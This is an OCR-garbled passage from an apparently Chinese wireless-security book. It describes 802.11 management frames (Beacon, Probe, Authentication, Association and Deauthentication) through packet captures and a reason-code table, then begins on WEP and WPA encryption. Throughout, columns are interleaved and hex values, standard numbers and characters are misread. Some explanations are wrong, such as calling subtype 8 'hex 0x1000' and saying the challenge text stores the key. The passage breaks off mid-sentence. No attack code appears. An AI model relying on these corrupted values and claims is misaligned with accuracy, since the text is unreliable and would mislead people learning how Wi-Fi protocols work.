缩写 为 TU， 代 表 1024hs (microsecond) ， 相 
当 于 lms (millisecond) 。Beacon 通 常会 被 
设 定 为 100 个 时 间 单 位 ， 相 当 于 每 100ms， 
也 就 是 0.1s 传 送 一 次 Beacon 信 号 。 

下 图 为 Beacon 帧 的 结构 。 


FOR EYE 


半 TTT2ETS ET 
ER 


长 度 可 变 4 长 度 可 变 3 6 8 长 度 可 变 六 
一 


3 长 度 可 变 长 度 可 变 


在 MAC 头 中 的 信息 ， 需 要 关注 以 下 数 
据 信 息 。 

(1) Type。 表 示 管 理 帧 ，Beacon 帧 属 
于 管理 帧 ， 所 以 这 里 值 为 0。 

(2) Subtype。 子 类 型 ， 这 里 值 为 十 六 
进 制 的 0x1000， 也 束 是 十 进 制 的 8， 所 以 
确定 为 Beacon 帧 。 

(3) RA、DA。 均 为 广播 地 址 段 。 

(4) TA、SA。 转 发 地 址 、 源 地 址 是 
AP 地 址 。 

(5) BSS ID。 网 络 中 的 标识 。 


第 6 章 ”数据 帧 的 结构 与 加 密 原理 时 


下 图 为 抓 包 软 件 抓 取 的 真实 Beacon 帧 。 


~ IEEE 892.11 Beacon frame, Flags: 
Type/Subtype: Beacon frame (9x9868 ) 
~ Frame Control Field: 96x8669 
ra 986 = Version: 0 
.... 69.. = Type: Management frame (86) 
18868 .... = Subtype: 8 
» Flags: 9x966 
-999 8080 8888 96696996 = Duration: 6 microseconds 
Receiver address: Broadcast (ff:ff:ff:ff:ff:ff) 
Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 
Transmitter address: Tp-LinkT 6d:97:a2 (6c:4b:54:6d:97:a2) 
Source address: Tp-LinkT 8d:97:a2 (gc:4b:54:8d:97:a2) 
BSS Id: Tp-LinkT ed:97:a2 (Qc:4b:54:6d:97:a2) 
和 68669698 = Fragment number: 0 
1911 1911 8111 .... = Sequence number: 2999 
~ IEEE 882.11 wireless LAN 
» Fixed parameters (12 bytes) 
» Tagged parameters (226 bytes) 


1. 帧 主体 


管理 帧 十 分 灵活 ， 帧 主体 (frame 
body) 中 的 大 部 分 数据 如 果 使 用 长 度 固 定 
的 字段 ， 就 称 为 固定 字段 (fixed field); 
如 果 字 段 长 度 不 确定 ， 就 称 为 信息 元 素 
(information element) 。 所 谓 信 息 元 素 ， 
是 指 长 度 不 确定 的 数据 块 (data block) 。 每 
个 数据 块 均 会 标注 类 型 编号 和 大 小 ， 各 
信息 元 系 的 数据 字段 元 素 都 有 特定 的 解释 
方式 。 

下 图 为 Beacon 帧 主体 数据 及 Capability 
Ds 


9 [se oye 


en 
Saeed, Wd Wi Ee eapabilit < S: ns 并 is an AP 
A. = TRSS sta 


T nngs RS: 
ia 三 Se se rtic pd i ee 0 S; Wh f= oint coordinator at AP (Bx69) 
二 t WEP 


= Channel 站 Not ln U 
= trum Managem ae -= ed 
i Time: 


= ee Power ga ry: Not Implemented 
So eas a nes = Radio ement; Not Implemented 

| pe A Not Allowed 

sO ovee -sme * = Delayed Bloc Kk Ack; Not Implemented 

a lh Sa es = Immediate Block Ack: Not Implemented 

S (226 Borin S)} 


Beacon 帧 主体 数据 及 Capability Info 字 
段 的 主要 信息 介绍 如 下 : 

(1) Timestamp 〈 时 惟 ) 。 可 用 来 同步 
BSS 中 的 工作 站 ，BSS 的 主 计时 器 会 定期 
发 送 当 前 已 使 用 的 微 秒 数 。 当 计数 器 到 达 
最 大 值 时 ， 便 会 从 头 开 始 计数 。〈 对 一 
个 长 度 64bit、 可 计数 超过 580000 年 的 
计数 器 而 言 ， 很 难 会 遇 到 有 从 头 开 始 计数 
的 一 天 ) 

(2) Intrval。 定 时 发 送 位 ， 该 位 数据 表 
明 Beacon 帧 间隔 多 长 时 间 进 行 重新 广播 。 

(3) Capability Info〈 性 能 信息 ) 字段 。 


2 


二 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 〈《 超 值 版 ) 


传送 Beacon 信号 的 时 候 ， 它 被 用 来 告知 网 
络 具备 何 种 性 能 ， 此 字段 应 用 于 Beacon 帧 、 
Probe Response 帧 、Probe Request 帧 。 


2. Beacon 帧 标记 参数 
下 图 为 Beacon 帧 标记 参数 。 


~ IEEE 802,11 wireless LAN 

» Fixed parameters (12 bytes) 

~ Tagged parameters (226 bytes) 
» Tag: SSID parameter set: TP-LINK 9 
» Tag: Supported Rates 1(B), 2(B), 5. 5(8), ii{(B}), 9, i18, 36, 54, [Mbit/sec] 
» Tag: DS Parameter set: Current Chann 
» Tag: an Supported Rates 6, 12, 0 | 了 aa sec] 
» Tag: Coun Information: Country Code CN Any 
» Tag: AP od Report: Operating Class 32, in it 2 


3, 
» Tag: AP Channel Report: Operating Class 33, Channel List : 5, 6, 7, 
» Tag: Traffic Indication Map (TIM): DTIM B of 8 bitmap 
» Tag: vendor et Microsoft Corp.: WPA Information Element 
» Tag: RSN Informat 
» Tag: ERP dt hbase 
» Tag: HT Ca D1 . He 
» Tag: HT Information {8B2 D 
» Tag: ee eld BSS ey me 
» Tag: Vendor Specific: Microsoft et WMM/WME: Parameter Element 
» Tag:; QBSS Load Element 862.11e CCA Version 
» Tag: vendor Specific: Ralink Technology, Corp. 


主要 参数 介绍 如 下 : 

(1)SSID 信息 。 包 括 SSID 的 网 络 标识 、 
SSID 的 长 度 等 ， 如 果 设 置 隐藏 AP 抓 到 的 
数据 帧 中 SSID 为 空 ， 但 是 长 度 有 数据 ， 通 
过 这 点 可 以 判断 是 否 有 隐藏 AP。SSID 信 
息 如 下 图 所 示 。 


~ Tag: SSID parameter set: TP-LINK 97A2 
Tag Number: SSID parameter Set (9) 
Tag length: 12 
SSID: TP-LINK 97A2 


r 更 


4 
8, 


(2) Supported Rates 字段 。AP 所 支持 的 
工作 速率 ， 如 下 图 所 示 ， 通 过 这 个 速率 也 
可 以 大 概 判断 AP 是 文 持 哪 种 IEEE 802.11 
协议 。 

r Tag: Supported Rates i1{B), 2(B), 5.5(B), 1ii1{(B), 9, 1i8, 36, 54, [Mbit/secl] 
Tag Number: Supported Rates (1) 

Tag length: 8 

Supported Rates: 1(B) (9x82) 

supported Rates: 2(B) (@x84) 

Supported Rates: 5.5(B) (Ox8b) 

supported Rates: 11i(B) (68x96) 

Supported Rates: 9 (Ox12) 

supported Rates: 18 (Qx24) 


Supported Rates: 36 (Ox48) 
supported Rates: 54 (Qx6cC) 


(3) DS Parameter Set 字段 AP 工 作 
信道 ， 如 下 图 所 示 。 描 述 了 当前 工作 的 信 
道 ， 实 际 上 这 个 字段 在 Radiotap 中 有 。 
Radiotap 是 网 卡 在 接收 信号 时 ， 去 除 PLCP 
header 部 分 后 ， 在 本 地 增加 的 头 部 ， 其 中 就 
有 功率 、 信 道 这 样 的 物理 层 信息 。 

- Tag: DS Parameter set: Current Channel: 1 
Tag Number: DS Parameter set (3) 


Tag length: 1 
Current Channel: 1 


AP 中 支持 的 扩展 速率 ， 
所 示 。 


如 右上 图 


90 


~ Tag: Extended Supported Rates 6, 12, 24, 48, [Mbit/sec] 
Tag Number: Extended Supported Rates (50) 
Tag length: 4 


Extended Supported Rates: 6 (9xec ) 
Extended Supported Rates: 12 (9x18) 
Extended Supported Rates: 24 (9x30) 
Extended Supported Rates: 48 (96x60 ) 


(4) country 字段 。 表 面 上 这 个 字段 用 
处 不 大 ， 仅 仅 表明 了 国家 代号 。 实 际 上 这 
个 字段 是 用 来 控制 信号 发 送 功率 的 。 由 于 
A ne ola rnin 
功率 ， 不 能 够 违法 。 在 beacon 中 ， 即 通过 
country pe 点 的 发 射 功率 。 
同样 的 ， 也 有 限定 能 够 使 用 的 信道 范围 ， 
如 下 图 所 示 。 


* Tag: Cou Information: Country Code CN, Enviror 
Tag NU i r: Countrv Information (71 
Tay lenyth; 6 

;7 CN 


nent Any 


Codie : Ol 
Environaen t: A [Ox28 


】 
» Country Info: First Channe mit Power Level: 28 dBm 


(5) TIM 标记 。 这 里 主要 就 是 与 DTIM 
有 关 ， 有 关 Beacon 周期 设置 与 节能 有 关 的 
部 分 ， 都 与 该 字段 有 关 ， 如 下 图 所 示 。 


- Tag: Traffic Indication Map (TIM): DTIM © of © bitmap 
Tag Number: Traffic Indication Map (TIM) (5) 
Tag length: 4 
DTIM count: 0 
DTIM period: 1 
~ Bitmap control: 9x69 
i © = Multicast: False 
006000 6900. = Bitmap Offset: 96x99 
Partial Virtual Bitmap: 08 
Association ID: 9x93 


(6) Vendor Specific。 使 用 WPA 进行 数 
据 加 密 ， 不 是 每 个 设备 都 会 选取 该 字段 ， 
如 下 图 所 示 。 


~ Tag: vendor Specific: Microsoft Corp.: 
Tag Number: Vendor Specific (221) 
Tag length: 22 
OUI: 80:50:f2 (Microsoft Corp.) 
Vendor Specific OUI Type: 1 
Type: WPA Information Element (x61) 


1 Nunber: 1, Number of channels: 13, Maximum Trans 


WPA Information Element 


WPA Version: 1 
* Multicast Cipher Suite: 00:50:f2 (Microsoft Corp.) AES (CCN) 
Multicast Cipher Suite 0UI: 09:5g:f2 (Microsoft Corp.) 
Multicast Cipher Suite type: AES (CCM) (4) 
Unicast Cipher Suite Count: 1 
v Unicast Cipher Suite List QB:50:f2 (Microsoft Corp.) AES (CCN) 
» Unicast Cipher Suite: ©0:50:f2 (Microsoft Corp.) AES {CCM) 
Auth Key Management (AKN) Suite Count: 1 
~ Auth Key Management (AKM) List QB:5g:f2 (Microsoft Corp.) PSK 
~ Auth Key Management (AKM) Suite: QB:5g:f2 (Microsoft Corp.) PSK 
Auth Key Management (AKM) OUI: 696:59:f2 (Microsoft Corp.) 


(7) ERP information 部 分 。ERP 全称 
是 Extended Rate PHY， 就 是 802.11g 对 应 
的 模式 。 在 这 里 主要 是 为 了 兼容 模式 所 存 
在 ， 主 要 关注 其 中 的 Non ERP Present 位 ， 
通过 该 位 ， 可 以 同步 全 网 开启 对 802.11b 的 
兼容 ， 人 否则 就 关闭 兼容 。 由 于 是 beacon 进 
行 同 步 的 ， 所 以 一 旦 开局 ， 全 网 所 有 的 STA 
都 是 工作 在 兼容 模式 下 ， 如 下 图 所 示 。 
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- Tag : ERP _ Information ~ IEEE 802.11 wireless LAN 
Tag Number: ERP Information (42) 和 
~ Tag: SSID parameter set: wan 
Tag length: 1 Tag Number: SSID parameter set (9) 
~ ERP Information: Ox04 he Dip 3 
i 3 SID: wan 
i 9 = Non ERP Present : Not Set » Tag: Supported Rates 1, 2, 5.5, 11, [Mbit/sec] 
0. = Use Protection: Not set » Tag: Extended Supported Rates 6, 9, 12, 18, 24, 36, 
.... .1.. = Barker Preamble Mode: Set » Tag: DS Parameter set: Current Channel: 1 
we » Tag: HT Capabilities (802.11n D1.10) 
80000 0... = Reserved: 9x69 » Tag: Vendor Specific: Microsoft Corp.: Unknown 8 
» Tag: Extended Capabilities (5 octets) 


6.3.3 Probe Request (探测 请 求 ) 帧 6.3.4 Probe Response (回应 探测 


Probe Request( 探 测 请 求 》 帧 ， 该 帧 响应 ) 帧 性 
一 般 用 于 STA 探 测 网 络 中 的 AP 时 来 使 用 ， a 
和 第 1 种 形式 为 探测 网 络 中 所 有 Probe Response 帧 的 MAC 头 信息 ， 如 喇 千 吉 
， 第 2 种 形式 为 探测 之 前 连接 过 的 AP。 ， 下 图 所 示 ， 其 中 Type 位 为 0， 表 明和 是 管理 人 
Et 求 后 并 且 STA 之 帧 ，Subtype 位 为 5， 表 明子 类 型 为 Probe Re- 
前 连接 过 该 AP， 此 时 AP 会 回应 一 个 Probe sponse 帧 。 


Response (回应 探测 啊 应 》 帧 。 | Type/Subtype: Probe Resppnse (9Xx99065 ) 
Probe Request 帧 的 MAC 头 信 忌 9» 如 sse se 860 - Version: 9 
. 00.. = Type: Management frame (9) 


下 图 所 示 ， 其 中 Type 位 为 0， 表明 是 管理 G101 .... = Subtype: 5 


Hy .000 0000 1101 1111 = Duration: 223 microseconds 
帧 [， Subtype 位 为 4， 表明 子 类 型 为 Probe Receiver address: Guangdon 6f:e7:df (38:29:5a:6f:e7:df) 
Destination address: Guangdon_6f:e7:df (38:29:5a:6f:e7:df) 
Request 帧 Transmitter address: HuaweiTe_7d:37:95 (e4:68:a3:7d:37:95) 
Source address: HuaweiTe 7d:37:95 (e4:68:a3:7d:37:95) 
BSS Id: HuaweiTe_7d:37:95 (e4:68:a3:7d:37:95) 


ht IEEE 862 .11 Probe Request, Flags: | os soos OODO 一 Fragment number: [©] 
htt ht eh I (9x9664) 69169 1060 9616 .... = Sequence number: 1154 
~ Frame Control Field: Ox 
a 99 = Version: 0 友 ] > 
.... 090.. = Type: Management frame (0) 下 为 Probe Response 贵 数据 部 介 
9169 .... = Subtype: 4 
» Flags: 9Xx99 信息 。 
.000 0000 0000 0009 = Duration: © microseconds 
Receiver address: Broadcast (ff:ff:ff:ff:ff:ff) F TIEEE 802.11 wireless LAN 
Destination address: Broadcast (ff:ff:ff:ff:ff:ff) ” Fixed rhe 
Transmitter address: Google_e0:c2:23 (da:ali:19:e0:c2:23) Beacon Interval: 8.264869 [Seconds] 
Source address: Google_eg:c2:23 (da:al:19:e9:c2:23) ee Ee Sess capapt1ir1es: 0 
BSS Id: Broadcast (ff:ff:ff:ff:ff:ff) ,ss，.,，,,，,.6，- IBSS slalus; Transmitter ,belonys Lo a BSS js pe 
ee 00609 = Fragment number: 0 Me RE3 eee Point coordinator at ar (an 
0110 1011 1010 .... = Sequence number: 1722 Short Preaable: Allow 
a 和 。 ee Not Allowed 
a Bes 。 = nel Agilitry: Mnf 
N WE 8 ,.。。。。。。。 = er Management : Not Implemented 
= SSID 长 度 为 0 时 > Probe 不 包含 具体 二 a ee Autonatie power 0 very: ee Implemented 
“sss oss ooo. ses。 = Radio Measurement: Not Iaplemented 
一 个 ee se ooor on0s eee Not Allowed 
的 SSID 信 息 ， 如 果 茶 个 AP 隐藏 了 SSID， 就 生生 -一下 
r Tagyed pardmelers (74 py 4 
Z| » Tag: SSID parame 
不 回应 这 种 Probe Request, 如 下 图 所 示 。 ， Tag; su uppo th d Ratcs 1e)， 2(B)， bes .11(8), 6, 9, 12, 18, [Mbit/scc] 
» Tag: DS Parameter set: Current Chan 
» Tag: Country Information: Cou untry ey Ba EnvIronment Any 
~ IEEE 892 .11 wireless LAN an TPC rs ee Power: 39, Link Margin: 2 
he A 5 24, 36, 48, 54, [Mbit/sec 
“ Tagged parameters (65 bytes ) sh vendor ed Shpporte Nicrosoft Corp,: We he Element 
- Tag: SSID parameter set: Wildcard SSID » Tag: Vendor Specific: Atheros Communications, Inc.: Advanced Capability 
Tag Number: SSID parameter set (0) 
Ri 其 中 ，Beacon Iterval 字 段 给 出 了 Beacon 
» Tag: Supported Rates 1, 2, 5.5, 11, [Mbit/sec] > . 1 
» Tag: Extended Supported Rates 6, 9, 12, 18, 24, 36, 帧 发 送 间隔 ， ESS 字 段 表 明 该 数据 由 AP 妆 
» Tag: DS Parameter set: Current Channel: 1 ME ck 、 人 pA 网 
» Tag: HT Capabilities (892.1ln D1.19) 发 送 ， 其 中 Tagged 标 记 中 还 会 给 出 SSID 以 
» Tag: Vendor Specific: Microsoft Corp.: Unknown 8 
» Tag: Extended Capabilities (5 octets) 及 传输 速率 ， AP 是 根据 SSID 以 及 传输 速率 


当 SSID 长 度 大 于 0 时 ， 此 SSID 即 为 要 扫 ” 判断 此 STA 是 否 连 接 过 ， 如 果 这 两 个 字段 
描 SSID， 如 果 SSID 隐 藏 ， 当 收 到 这 种 Probe ”相同 ， 即 使 STA 与 AP 之 前 并 没有 建立 过 连 
Request 包 ， 必 须 回应 Probe Response 帧 ， ， 接 ，AP 也 会 回应 Probe Response 帧 数据 。 
Probe Response 包 含 了 很 多 SSID 的 信息 ; 这 Se i 
种 类 型 的 包 对 于 连接 隐藏 SSID 是 必要 的 ， ，6.3.5 Association (身份 认证 ) 帧 人 
如 下 图 所 示 。 Association (身份 认证 ) 顺 的 MAC 头 时 Te 
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信息 ， 如 下 图 所 示 ， 其 中 Type 位 为 0， 表 明 
是 管理 帧 ，Subtype 位 为 11， 表 明子 类 型 为 
Probe Request 帧 。 


~ IEEE 892.11 Authentication, Flags: ........ 
Type/Subtype: Authentication (Ox0860b) 
~ Frame Control Field: Oxb9800 
a 99 = Version: © 
sa .. = Type: Management frame (©) 
1611 .... = Subtype: 11 
» Flags: 9x90 
.999 ©0909 :1101 1111 = Duration: 223 microseconds 
Receiver address: Guangdon_ 6f:e7i:df (38:29:5a:6f:e7:df) 
Destination address: Guangdon_6f:e7:df (38:29:5a:6f:e7:df) 
Transmitter address: HuaweiTe_7d:37:92 (e4:68:a3:7d:37:92) 
Source address: HuaweiTe 7d:37:92 (e4:68:a3:7d:37:92) 
BSS Id: HuaweiTe_7d:37:92 (e4:68:a3:7d:37:92) 
ee 0000 = Fragment number: © 


0001 0009 0000 .... = Sequence number: 256 
下 图 为 Association 帆 数据 部 分 。 


~ IEEE 892.11 wireless LAN 加 
~ Fixed parameters (6 bytes ) 
Authentication Algorithm: Open System (0) 
Authentication SEQ: OQx0002 
Status code: Successful (QOx00060) 


主要 参数 介绍 如 下 : 

(1) Authentication Algorithm。 身份 认 
证 类 型 ， 取 值 为 0 代表 开发 系统 身份 认证 
无 须 密 码 ， 取 值 为 1 代表 为 共享 密 钥 号 份 
认证 。 

(2) Authentication SEQ。 身份 认证 帧 
序列 和 号， 由 于 喘 份 认证 会 有 多 个 帧 交换 ， 
所 以 SEQ 是 每 次 身份 验证 的 中 的 一 个 序列 
号 ， 取 值 为 1 ~ 65535 这 个 范围 。 

(3) Status Code。 认 证 是 否 成 功 。 

(4) Challenge text。 该 字段 只 有 使 用 共 
享 密 钥 才 会 出 现 ， 用 于 存放 密 钥 。 


Association Response 


当 移 动工 作 站 试图 关联 接 入 点 时 ， 接 
入 点 会 回复 一 个 Association Response (关联 
吧 应 ) 或 Reassociation Response (重新 关联 
吧 应 ) 帧 ， 两 者 之 间 的 差别 在 于 Frame Con- 
trol 位 所 记载 的 subtype 位 。 所 有 位 均 是 必须 
的 。 在 应 答 的 过 程 中 ， 接 入 点 会 指定 一 个 
Association ID 《关联 识别 码 ) ， 至 于 指定 
的 方式 则 因 实 际 操 作 而 不 同 。 

下 图 为 Association Request (关联 请 
求 ) 帧 的 MAC 信 息 。 
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Type/Subtype: Assnciation Request (QOQxQ000) 


a 60 = Version: 0 


.... 00.. = Type: Management frame (9) 
8009 .... = Subtype: 9 


上 

.909 0001 8089011 1619 = Duration: 314 microseconds 

Receiver address: 62:1f:3f:7f:5e:4d (62:1f:8f:7f:5e:4d) 
Destination address: 62:1f:8f:7f:5e:4d (62:1f:8f:7f:5e:4d) 
Transmitter address: Guangdon_12:c5:c8 (dc:6d:cd:12:c5:c8) 
Source address: Guangdon 12:c5:c8 (dc:6d:cd:12:c5:c8) 

BSS Id: 62:;1f:8f:7f:5e:4d (62:1f:8f:7f:5e:;4d) 
和 0080 = Fragment number: 0 

9011 1011 8010 .... = Sequence number: 946 


下 图 为 Association Request 帧 数据 
部 分 。 


~ IEEE 8602.11 wireIess LAN 
- Fixed parameters (4 bytes) 
~ Capabilities Information: ©@x8491 


pabilities; Transmitter is an AP 
status: Transmitter belongs to a BSS 


ESS 
0. = IBSS 


8. .... 0B.. = CFP participation capabilities: No point coordinator at AP (Bx668) 
--..B .... = Privacy: AP/STA cannot support WEP 

"pe a . = Short Preamble: Not Allowed 
+ 0, ,= PBCC: Not Allowed 
S 攻 省 证 宙 家 和 8,.,, ,,.. = Channel Agility; Not in use 
sd ,= Spectrum Management: NOC lplemenrced 
Short Slot Timc: In 
se Oo = Automatic Power Save Delivery: Not Implemented 
.2B .... Radio Measurement: Not Implemented 
, ,日 ，,,,，.,.,，,,,，= DSSS-OFDM: Not Allowed 


,Bi - Delaycd Bluck Ack; NoL Implementey 
9...，...。..,，,... = JImmediate Block Ack: Not Implemented 
Listen Interval: 6x69961 
r Tagged parameters (65 bytes) 
» Tag: SSID parameter set: CMCC-SHARE 
» Tag; Supported Rates 1(B), 2{6B), 5.5(B), 11{6), 10, 24, 36, 54, [Mbit/sec] 
» Tag: Extended Supported Rates 6, 9, 12, 45, [Mbit/sec] 
» Tag: HT Capabilities (892.1in Di1.19) 
» Tag: Vendor Specific: Microsoft Corp.: WMM/WME: Information Element 


下 图 为 Association Response (关联 啊 
应 ) 帧 MAC 信 息 。 


Type/Subtype: Assnociation Response (QOQx0001) 


= Version: 9 
.... 60909.. = Type: Management frame (9) 
G001 .... = Subtype: 1 


.000 90906069 9111 1111 = Duration: 127 microseconds 

Receiver address: O00:bO:6c:13:8f:55 (90:bg9:6c:13:8f:55) 
Destination address: 90:bo:6c:13:8f:55 (90:b9:6c:13:8f:55) 
Transmitter address: HuaweiTe_7d:37:91 (e4:68:a3:7d:37:91) 
Source address: HuaweliTe_7d:37:91 (e4:68:a3:7d:37:91) 

BSS Id: HuaweliTe_rd:37:91 (e4:68:a3:7d:37:91) 
0 90999 = Fragment number: 0 

0001 0000 0001 .... = Sequence number: 257 


下 图 为 Association Response 帧 数据 
部 分 。 


~ IEEE 602.11 wireless LAN 
r Fixed parameters {6 bytes) 
~ Capabilitios Information: OxBA424 
ouus sou .-.. ..-1 = ESS capabilities: Transnitter is an AP 
,1 1 8, = IBSS status: Transmitter belongs to a BSS 
BBO,, = ChP participation capabilities; NO point coordinator at AP (gxB8) 


oases. sees eu. © .... = Privacy: AP/STA cannot support WEr 
.,，，, ,1，,,.，= Short Preamble: Allowed 
ss es BB,., .= PBCC: Not Allowed 
Se BB... ..-.. = Channel Agility: Not in use 
sss sss B.Spectlrues ManadayemeliL: NOL IeplemertLeu 
sese nae oue sens = Mwrt Slot Tine: In vses 
w+ ,= AUtomatic Power Save Delivery: Not Implemented 
ws = Radio Measurement: Not Implemented 
0, oo ee = DSSS-OFDM: Not Allowed 


‘Os = Delayecd Dlock Ack: Not Implemented 
0... .. .= Tamediate Plock Ack: Mot Tanlementer 
Status code: Successful [6xbB6B) 
-.9B 6666 66866 1808 = Association ID: 9xBb668 
~ Tagged parameters (42 bytes) 
+ Tag: Supported Rates 1{6), 2(6), 5.5(68), 6, 9, 11{6), 12, 18, [Mbit/sec] 


» Tag: Extended Supported Rates 24, 35, 48, 54, [Mbit/sec] 
» Tag: Vendor Specific: Microsoft Corp.: WMM/wWME: Parameter Element 


其 中 Status code 字 段 表 明 是 否 关 联 成 
功 ，Association ID 字段 是 关联 成 功 后 AP 给 
客户 端的 一 个 ID， 用 于 标记 在 AP 关联 列表 
中 ， 也 用 于 客户 端 唤醒 时 使 用 。 


6.3.7 Disassociation 与 Deauthentication 


Disassociation 〈 取 消 关 联 ) 帧 用 来 取 
消 一 段 关 联 关 系 ， 而 Deauthentication (〈 解 
除 认 证 ) 帧 则 用 来 解除 一 段 认 证 关系 。 两 
者 均 包含 一 个 固定 位 Reason Code (原因 代 
码 ) ， 当 然 Frame Control 位 彼此 不 同 ， 因 为 
不 同类 型 的 管理 帧 拥有 不 同 的 子 类 型 。 

下 图 为 Disassociation 帆 数据 信息 。 


|- IEEE 8B2.11 ee Flagsz ....R... 
Type/Subtype isa 
~ Frame Control Field: exa8g8 


-- 6.. = Type: Management frame (6) 
161416 .... = Subtype: 18 


: 89x6g 
.999 890860 6lll lllli = Duration: 127 Microseconds 
Receiver address: VivoMobi 84:62:86 (19:f6:81:84:62:96) 
Destination address: VivoMobi 84:62:86 (10:f6:81:84:52:86) 
Transmitter address: HuaweiTe gc:ig:a2 (bd4:15:13:8C:10:a2) 
Source address: HuaweiTe gc:1ig:a2 (b4:15:13:8cC:10:a2) 
BSS Id: HuaweiTe 8c:1i9:a2 {b4:15:13:8cC:10:a2) 
和 冲击 是 B86 = Fragment number: © 
001 8008060 B81 .... = Sequence number: 258 
~ IEEE 892.11 pep LAN 
~ Fixed ere eters (2 Er 人 
Rea ri i cia 


ndi ng STA is leavi ng Rar has le aft) E BSS 《Bx S886} 


下 名 为 Deauthentication 帧 信息 最 ,。 


~ IEEE 802.11 Deauthentication, Flags: .. 


Type/Subtype: Deauthentication es 
~ Frame Control] Field: 9xc908 
和 906 = Version: 9 
.... 00.. = Type: Management frame (9) 
11060 .... = Subtype: 12 
» Flags: 9x98 
.000 8660060 60111 1111 = Duration: 127 microseconds 
Receiver address: XiaomiCo b5:d8:d3 (78:92:f8:b5:d8:d3) 
Destination address: XiaomiCo _b5:d8:d3 (78:82:f8:b5:d8:d3) 
Transmitter address: HuaweiTe 8c:10:a5 (b4:15:13:8c:10:a5) 
Source address: HuaweiTe 8c:10:a5 (b4:15:13:8c:10:a5) 
BSS Id: HuaweiTe_ 8c:10:a5 (b4:15:13:8c:10:a5s) 
0 G0860 = Fragment number: 9 
O001 60660666 1010 .... = Sequence number: 266 
v IEEE 882.11 wireless LAN 
r Fixed parameters (2 bytes) 


Reason code: Previous authentication no longer Valid (DBx909092) 


其 中 Reason code 字 段 表明 取消 关联 或 
者 解除 认证 的 方式 ， 见 下 表 。 
表 取消 关联 或 者 解除 认证 的 方式 


Reason 
Code 


0 No Reason Code Normal operation 


Client assoclated but 


Description Meaning0 


1 Unspecified Reason 
P no longer authorized 
Previous . 
i Client assoclated but 
2 Authentication no . 
not authorized 
longer valid 
Deauthenticated 
3 Deauthentication because sending STA 
leaving ls leaving IBSS or 
ESS 


D1isassocilation Due 


Client session 
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ne Description Meaning0 
Code Pp 9 
AP 1s busy and 
E Disassociation AP unable to handle 
Busy currently associated 
clients 
Client attempted to 
Class2 Frame from 
. transfer data before 
6 Non-Authenticated . 
. lt Was 
Station 
Authenticated 
站 人 Client attempted to 
ass3 Frame from 
transfer data before 
了 Non-Assoclated 
lt Was 
Station . 
Associated 
Disassociation STA | STA 1s leaving or has 
8 
has Left left BSS 
STA Request STA(re) assoclation 
Association ls not authenticated 
Without with 
Authentication Responding station 


Ba Missing Reason Client momentarily 
Code In an unknown state 


6.4 ”无 线 通 信人 加 密 原 理 


在 了 解 了 无 线 通信 的 数据 帧 结构 后 ， 
下 面 介 绍 无 线 通 信 的 加 密 原 理 ， 目 前 无 线 
通信 中 的 加 密 方式 有 两 种 ， 分 别 是 WEP 与 
WPA。 其 中 ，WAP 又 分 为 WPA1 与 WPA2 
两 种 。 


6.4.1 WEP 的 加 密 原理 


WEP 通 过 RC4 算 法 进行 加 密 ， 通 过 站 区 


to Inactivity timeout exceeded 


CRC32 算 法 进行 数据 完整 性 校 验 。RC4 加 密 
解密 的 原理 如 下 。 
加 密 解密 
1011 B 1000 8 
xor 0011 3 xor 0011 3 
1000 8 1011 B 
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WEP 整 个 加 密 过 程 可 以 通过 一 张 图 来 
描述 ， 如 下 图 所 示 。 其 中 ,IV (Initializa- 
tion Vector) 为 初始 向 量 ， 由 客户 端 随机 


整个 WEP 加 密 的 过 程 ， 如 果 要 分 步骤 
来 摘 述 ， 可 以 分 为 以 下 几 个 步骤 : 
由 客户 端 随机 生成 TV， 然 后 与 无 线 密 
码 相 结合 生成 KSA (初始 向 量 表 ) 。 
原始 发 送 数 据 通 过 CRC32 生 成 ICV 
(数据 完整 性 校 验 信息 ) 。 
原始 数据 与 ICV 结 合生 成 数据 流 。 
step 贺 通过 PRGA 算 法 结合 数据 流 长 度 ， 计 
算 生 成 密 钥 流 。 密 钥 流 与 数据 流 是 一 一 对 
应 的 关系 。 
密 钥 流 与 数据 流 异 或 运算 得 到 加 密 后 
数据 。 
发 送 数据 包头 部 包含 TV 信息， 尾部 
包含 ICV 人 信息， 如 果 发 送 数据 超出 数据 包 大 
小 ， 会 对 数据 包 进 行 切 片 处 理 ， 此 时 IV 后 
面 会 跟 上 Key ID，Key ID 用 于 标识 该 数据 包 
是 切片 后 数据 包 的 第 几 个 包 。 


六 锯末 6.4.2 ”WPA 的 加 密 原理 


WPA 分 为 WPA1 和 WPA2， 最 早出 现 


” ”WPA1 是 因为 WEP 存 在 严重 漏洞 ， 因 此 


WPA1 的 出 现 是 为 了 解决 当时 WEP 所 存在 的 
缺陷 ， 它 是 在 WEP 的 基础 上 通过 软件 实现 
密码 扩充 。 

WPA1 与 WEP 的 相同 之 处 在 于 它们 都 是 
采用 逐 包 加 密 ，128 位 的 Key 和 48 位 的 初始 
回 量 CIV) ， 同 样 使 用 RC4 流 加 密 技 术 ， 


100 


不 过 ，WPA1 采 用 了 帧 计数 器 ， 可 以 有 效 避 
免 数 据 重 放 攻 击 ， 并 且 采 用 了 TKIP (动态 
WEP) 算法 ，TKIP 由 RC4+Michael 完 整 性 
校 验 所 组 成 。 

WPA2 则 是 依据 802.11 全 新 设计 来 实现 
的 ， 它 使 用 CCMP 蔡 代 了 TKIP， 使 用 AES 
加 密 算法 替代 了 RC4 算 法 ， 由 于 是 全 新 设计 
的 ， 因 此 不 同 下 兼容 WEP 设 备 。 

WPA 在 数据 通信 中 会 有 三 个 过 程 : 


1. 协商 安全 协议 


协商 认证 方式 中 STA 会 通过 探测 帧 获取 
到 AP 中 的 网 络 信息 ， 其 中 包括 速率 、 加 密 
方式 、 信 道 以 及 网 络 名 称 ， 同 样 会 协商 通 
信 模 式 采 用 单 播 、 组 播 还 是 广播 ， 加 密 套 
件 使 用 TKIP 还 是 CCMP。 


2. 窗 钥 分 发 和 验证 


无 线 网 络 设计 用 于 一 组 无 线 设备 通信 ， 
关联 到 同一 设备 共享 无 线 信道 ， 根 据 通 信安 
全 特性 不 同 ， 分 为 单 播 、 组 播 和 广播 。 

单 播 通信 和 是 AP 与 STA 之 间 的 一 个 私密 
通信 ， 因 此 它们 会 保存 彼此 的 一 个 私 钥 PTK 
(Pairwise Key) 也 被 称 为 点 到 点 密 钥 ， 这 个 
密 钥 是 临时 性 的 ， 一 旦 到 期 需要 重新 计算 。 

组 播 通信 和 是 AP 与 域内 所 有 成 员 共 享 的 
同一 密 钥 GTK (Group Key) 组 密 铀 ， 这 个 
